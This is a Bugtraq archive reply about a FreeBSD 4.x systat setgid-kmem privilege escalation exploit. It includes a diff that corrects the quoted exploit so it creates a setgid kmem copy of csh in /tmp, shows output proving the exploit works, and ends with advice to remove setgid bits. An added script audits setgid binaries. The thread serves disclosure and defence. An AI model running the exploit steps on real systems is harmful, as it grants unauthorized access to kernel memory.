Bugtraq mailing list archives
Re: FreeBSD 4.x systat exploit
From: Steve Reid <sreid () SEA-TO-SKY NET>
Date: Tue, 10 Oct 2000 18:28:44 -0700
On Tue, Oct 10, 2000 at 02:52:17PM +0200, Przemyslaw Frasunek wrote:
> #!/bin/csh
> # (c) 2000 Przemysław Frasunek <venglin () freebsd lublin pl>
> #
> # FreeBSD 4.x systat gid=kmem exploit
> # Idea by: Jouko Pynnönen <jouko () SOLUTIONS FI>
> #
> # Dedicated to ksm.

[etc]

It doesn't work as posted. But that doesn't mean systat is safe, it just means you aren't "venglin":

--- exploit.csh.orig	Tue Oct 10 17:42:49 2000
+++ exploit.csh	Tue Oct 10 17:46:53 2000
@@ -11,7 +11,7 @@
 #!/bin/csh
 cp /bin/csh /tmp
-/usr/sbin/chown venglin.kmem /tmp/csh
+chgrp kmem /tmp/csh
 chmod 2755 /tmp/csh
 __EOF__

And now it works:

steve@grok:/home/steve% ./exploit.csh
-rwxr-sr-x  1 steve  kmem  622908 Oct 10 18:15 /tmp/csh
steve@grok:/home/steve% uname -srm
FreeBSD 4.1-RELEASE i386

BTW, /usr/bin/top is also linked to ncurses. I don't know if it's vulnerable or not (the exploit does nothing to top in my limited testing) but it might be prudent to remove the setgid bit from it too.

chmod a-s /usr/bin/systat /usr/bin/top
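The closing advice of the message above (strip the setgid bit from systat and top) assumes you know which setgid binaries in group kmem exist and which of them pull in ncurses. The following audit helper is an editorial addition to this archive page, not code from Steve Reid's message or from the original thread: it lists setgid files under a directory tree, optionally limited to one group, and flags the ones whose ldd output names an ncurses library. The function names, the directory and group parameters, and the use of ldd are assumptions of this example; the "kmem" default and the /usr/bin paths are the ones the post discusses.

```shell
#!/bin/sh
# Editorial audit helper added to the archive page; not part of the
# original mailing-list post. Function names and parameters are
# assumptions of this example.

# list_setgid DIR [GROUP]
# Print one path per line for every regular file under DIR with the
# setgid bit set. If GROUP is given, report only files owned by GROUP.
# Errors (unknown group, unreadable directories) are silenced so the
# output stays one path per line.
list_setgid() {
    dir=$1
    group=${2:-}
    if [ -n "$group" ]; then
        find "$dir" -xdev -type f -perm -2000 -group "$group" 2>/dev/null
    else
        find "$dir" -xdev -type f -perm -2000 2>/dev/null
    fi
}

# links_ncurses FILE
# Return 0 if ldd reports an ncurses shared object for FILE, 1 otherwise
# (also 1 when ldd is unavailable or FILE is not a dynamic executable).
links_ncurses() {
    command -v ldd >/dev/null 2>&1 || return 1
    ldd "$1" 2>/dev/null | grep -q 'libncurses'
}

# audit_setgid DIR [GROUP]
# Print "path<TAB>ncurses" or "path<TAB>no-ncurses" for every setgid
# file that list_setgid finds, so the operator can decide which ones
# deserve a "chmod a-s" as the post suggests for systat and top.
audit_setgid() {
    list_setgid "$1" "${2:-}" | while IFS= read -r f; do
        if links_ncurses "$f"; then
            printf '%s\tncurses\n' "$f"
        else
            printf '%s\tno-ncurses\n' "$f"
        fi
    done
}

# Example run matching the post: setgid kmem binaries under /usr/bin.
# audit_setgid /usr/bin kmem
```

Run it as an unprivileged user first; only the decision to clear the setgid bit needs root. On a system without a kmem group the group filter yields nothing, so fall back to the unfiltered form to see every setgid file.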
Current thread:
- FreeBSD 4.x systat exploit Przemyslaw Frasunek (Oct 10)
- Re: FreeBSD 4.x systat exploit Steve Reid (Oct 10)